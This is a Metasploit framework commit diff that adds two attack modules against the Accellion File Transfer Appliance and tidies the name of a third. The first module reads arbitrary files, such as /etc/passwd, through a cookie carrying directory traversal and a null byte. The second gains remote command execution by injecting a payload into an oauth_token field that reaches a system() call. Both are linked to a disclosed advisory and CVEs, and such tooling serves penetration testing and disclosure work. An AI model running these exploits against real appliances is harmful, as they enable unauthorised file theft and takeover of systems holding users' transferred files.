Land rapid7#5694, R7-2015-08

Author: Tod Beardsley

modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb

@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Accellion FTA 'statecode' Cookie Arbitrary File Read",
+      'Description'    => %q{
+          This module exploits a file disclosure vulnerability in the Accellion
+        File Transfer appliance. This vulnerability is triggered when a user-provided
+        'statecode' cookie parameter is appended to a file path that is processed as
+        a HTML template. By prepending this cookie with directory traversal sequence
+        and appending a NULL byte, any file readable by the web user can be exposed.
+        The web user has read access to a number of sensitive files, including the
+        system configuration and files uploaded to the appliance by users.
+        This issue was confirmed on version FTA_9_11_200, but may apply to previous
+        versions as well. This issue was fixed in software update FTA_9_11_210.
+      },
+      'Author'         => [ 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://r-7.co/R7-2015-08'],
+          ['CVE', '2015-2856']
+        ],
+      'DisclosureDate' => 'Jul 10 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => datastore['TARGETURI'],
+      'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',
+    })
+
+    return if not res
+
+    if res.code != 200
+      vprint_status("#{peer} Unexpected response code: #{res.code} #{res.message}")
+      return
+    end
+
+    contents = res.body.to_s
+
+    # Check for patched versions of the FTA
+    if contents =~ / Missing session ID.*Accellion, Inc/m
+      print_error("#{peer} Appears to be a patched Accellion FTA")
+      return
+    end
+
+    fname = ::File.basename(datastore['FILEPATH'])
+
+    expected_server  = "Apache"
+    expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'
+
+    # Use hints from the server headers to indicate whether we think this was a valid response
+    if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires
+      path = store_loot(
+        'accellion.fta.file',
+        'application/octet-stream',
+        rhost,
+        res.body,
+        fname
+      )
+      print_good("#{peer} Sucessfully downloaded #{datastore['FILEPATH']} as #{path}")
+    else
+      vprint_status(
+        "#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) " +
+        "(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})"
+      )
+    end
+  end
+
+end

modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb

@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Accellion FTA getStatus verify_oauth_token Command Execution',
+      'Description'    => %q{
+          This module exploits a metacharacter shell injection vulnerability in the Accellion
+        File Transfer appliance. This vulnerability is triggered when a user-provided
+        'oauth_token' is passed into a system() call within a mod_perl handler. This
+        module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
+        '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
+        version FTA_9_11_200, but may apply to previous versions as well. This issue was
+        fixed in software update FTA_9_11_210.
+      },
+      'Author'         => [ 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://r-7.co/R7-2015-08'],
+          ['CVE', '2015-2857']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl bash telnet',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 10 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true])
+      ], self.class)
+  end
+
+  def check
+    uri = '/tws/getStatus'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => 'invalid'
+    }})
+
+    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
+      return Exploit::CheckCode::Safe
+    end
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => "';echo '"
+    }})
+
+    unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+      return Exploit::CheckCode::Safe
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+
+    # The token is embedded into a command line the following:
+    # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
+    token = "';#{payload.encoded};echo '"
+
+    uri   = '/tws/getStatus'
+
+    # Other exploitable URLs:
+    # * /seos/find.api (works with no other changes to this module)
+    # * /seos/put.api  (requires some hoop jumping, upload)
+    # * /seos/mput.api (requires some hoop jumping, token && upload)
+
+    print_status("Sending request for #{uri}...")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => uri,
+      'vars_post' => {
+        'transaction_id' => rand(0x100000000),
+        'oauth_token'    => token
+    }})
+
+    if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
+      print_status("Valid response received...")
+    else
+      if res
+        print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
+      else
+        print_error("No reply received from the target")
+      end
+    end
+
+    handler
+  end
+
+end

modules/exploits/linux/misc/accellion_fta_mpipe2.rb

@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Accellion File Transfer Appliance MPIPE2 Command Execution',
+      'Name'           => 'Accellion FTA MPIPE2 Command Execution',
       'Description'    => %q{
           This module exploits a chain of vulnerabilities in the Accellion
         File Transfer appliance. This appliance exposes a UDP service on